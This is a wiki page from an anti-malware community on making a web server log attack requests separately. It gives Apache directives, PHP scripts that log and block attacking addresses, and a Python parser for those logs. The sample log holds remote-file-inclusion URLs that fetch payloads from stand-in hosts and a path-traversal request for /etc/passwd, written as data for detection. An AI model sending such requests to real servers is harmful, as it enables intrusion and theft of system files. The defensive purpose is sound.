WsIRT

From CastleCopsWiki


Server Attack Log Types

There are two different kinds of address of interest when a server is attacked:

  • the addresses the attack requests themselves originate from
  • the addresses the malware that the attack tries to inject is fetched from

Both usually belong to compromised ("assimilated") servers, so they do not differ much in nature. The first set, however, is dynamic: it changes with every execution of attack commands. The second is comparatively static, because the payload stays hosted in one place for a while. It is probably worth distinguishing the two log types for that reason.

Submit Malware Logs

Please look at the discussion page!

Currently, to submit new malware logs, you have to:

Creating Malware Logs

To be able to submit malware logs effectively, you should configure your server to write dedicated malware logs.

A quick-and-dirty solution for personal web servers running Apache:

LoadModule	setenvif_module	"modules/mod_setenvif.so"

# Mark a request as an attack by setting the environment variable is_crack
# (SetEnvIf assigns the value "1" when no value is given).
SetEnvIfNoCase	Request_URI	"^/(variant|variant|...)..." is_crack
# A second URL inside the request URI is the typical remote-file-inclusion pattern.
SetEnvIfNoCase	Request_URI	"http://" is_crack
...

# Write only the marked requests to the dedicated log.
CustomLog "path-to-log/cracker.log"	your-logformat env=is_crack

and/or, to do the logging in PHP:

LoadModule	rewrite_module	"modules/mod_rewrite.so"

# Hand every marked request to cracker.php; the original URL stays available
# to PHP in SCRIPT_URI, the query string is passed along (QSA).
RewriteCond %{ENV:is_crack} 1
RewriteRule "^(.*)$" "/cracker.php" [NE,L,PT,QSA]

together with this php.ini entry:

auto_prepend_file = "path-to-auto_prepend_file"

and an auto_prepend_file containing:

<?php
// A request for a non-.php resource that nevertheless reached the PHP handler
// (see http://issues.apache.org/bugzilla/show_bug.cgi?id=29090)
if (substr($_SERVER['SCRIPT_NAME'], -4) !== '.php')
{
	$cracktype = 'phpmiss';
	include $_SERVER['DOCUMENT_ROOT'].'/cracker.php';
	exit;
}
if (any-other-security-measure)
{
	$cracktype = 'whatever-else-id';
	include $_SERVER['DOCUMENT_ROOT'].'/cracker.php';
	exit;
}

$phplogs = path-to-your-php-logs;   // log directory, with trailing slash
$cipfile = $phplogs.'cracker.txt';  // addresses already caught by cracker.php

// Suppress any further access from an address that was logged as a cracker before.
// Entries in cracker.txt begin with "date time ip ", so match the address surrounded
// by spaces rather than as a bare substring (1.2.3.4 would otherwise also match 11.2.3.45).
$crackips = is_file($cipfile) ? file_get_contents($cipfile) : '';
if (strpos($crackips, ' '.$_SERVER['REMOTE_ADDR'].' ') !== false)
{
	$cracktype = 'suppressed';
	include $_SERVER['DOCUMENT_ROOT'].'/cracker.php';
	exit;
}

Finally, in cracker.php, do:

<?php
// $phplogs and $cipfile come from the auto_prepend_file, which has already run.

// blacklist
// whatever-you-need-to-blacklist...

// whitelist
$is_me = however-you-identify-yourself;
$whitelisted = $is_me; // || whatever-else...

$scriptname = $_SERVER['SCRIPT_NAME'];

if ($whitelisted && $scriptname != '/cracker.php' && $cracktype != 'phpmiss') // && !blacklisted
{
	// retreat from the defense and execute the original file instead
	chdir(dirname($_SERVER['SCRIPT_FILENAME']));
	require $_SERVER['SCRIPT_FILENAME'];
	exit;
}

// log the original request (from before the Apache rewrite)
$logfile = $phplogs.'cracker.log';

// SCRIPT_URI is set by mod_rewrite and holds the URL as originally requested.
// ip_escape() is the page's own helper and is not defined here; it must at least
// strip CR/LF so that a crafted request cannot forge additional log lines.
$request_logentry = date('Y-m-d H:i:s', $_SERVER['REQUEST_TIME']).' '.$_SERVER['REMOTE_ADDR'].' '
	.ip_escape($_SERVER['SCRIPT_URI'].(!empty($_SERVER['QUERY_STRING']) ? '?'.$_SERVER['QUERY_STRING'] : ''));
file_put_contents($logfile, $request_logentry.PHP_EOL, FILE_APPEND | LOCK_EX);

// record cracker ips to suppress further access by crackers, whatever they try
if (!$whitelisted)
{
	$crackips = is_file($cipfile) ? file_get_contents($cipfile) : '';
	if (strpos($crackips, ' '.$_SERVER['REMOTE_ADDR'].' ') === false)
	{
		file_put_contents($cipfile, $request_logentry.PHP_EOL, FILE_APPEND | LOCK_EX);
	}
}
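The log written by cracker.php contains both kinds of address from the first section: the client address the attack came from, and, for remote-file-inclusion attempts, the host inside the query string that the payload is fetched from. The following Python script is an added example, not code from this page or from CastleCops, that parses a few constructed cracker.log lines in the "date time ip url" layout used above and separates the two address sets. Every address and host in the sample is a documentation example, and the function names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of cracker.log lines in the "date time ip url" layout that the
# cracker.php script above writes (all addresses and hosts are documentation examples).
SAMPLE_LOG = """\
2007-06-01 10:15:02 203.0.113.7 http://www.example.org/index.php?page=http://198.51.100.23/bot.txt?
2007-06-01 10:15:05 203.0.113.7 http://www.example.org/index.php?page=http://198.51.100.23/bot.txt?
2007-06-01 11:02:41 192.0.2.99 http://www.example.org/admin/config.php?dir=HTTP://evil.example.net/inc/cmd.txt??
2007-06-01 11:40:00 192.0.2.99 http://www.example.org/nonexistent.php
2007-06-01 12:00:13 203.0.113.250 http://www.example.org/gallery.php?img=../../../../etc/passwd
"""

# "YYYY-MM-DD HH:MM:SS", the client address, the requested URL; anything else is ignored.
LINE_RE = re.compile(r'^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (\S+) (\S+)$')


def parse_cracker_log(text):
    """Return one dict per well-formed log line; malformed lines are skipped, not fatal."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        when, attacker, url = m.groups()
        entries.append({'time': when, 'attacker': attacker, 'url': url})
    return entries


def remote_sources(url):
    """Hosts named as http(s) URLs inside query-string values.

    In a remote-file-inclusion attempt the payload is fetched from this host,
    which is usually not the host the request itself came from.
    """
    hosts = []
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if value.lower().startswith(('http://', 'https://')):
            host = urlsplit(value).hostname   # lower-cased, without port or trailing junk
            if host:
                hosts.append(host)
    return hosts


def summarize(text):
    """Split a cracker.log into the two address sets described in the first section.

    Returns (attack_origins, malware_origins): how often each client address
    attacked, and how often each remote host was named as the payload source.
    """
    attack_origins = Counter()
    malware_origins = Counter()
    for entry in parse_cracker_log(text):
        attack_origins[entry['attacker']] += 1
        malware_origins.update(remote_sources(entry['url']))
    return attack_origins, malware_origins


if __name__ == '__main__':
    origins, sources = summarize(SAMPLE_LOG)
    print('attack origins :', dict(origins))
    print('malware sources:', dict(sources))
```

For the sample above the attack origins are the three client addresses, while the malware origins are 198.51.100.23 and evil.example.net, neither of which ever sent a request itself. Note that cracker.php does not write `$cracktype` into the log line, so the script can only recognise the remote-include case from the URL; the `phpmiss` and path-traversal hits show up in the attack-origin list but carry no source host.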

For the whole system to work best together with CastleCops, there should be an interface at CastleCops to which the script can send its log entries immediately. At the moment this fails at the spam defense (the captcha). We should establish a PKI-based interface that lets registered members submit reports without the captcha.
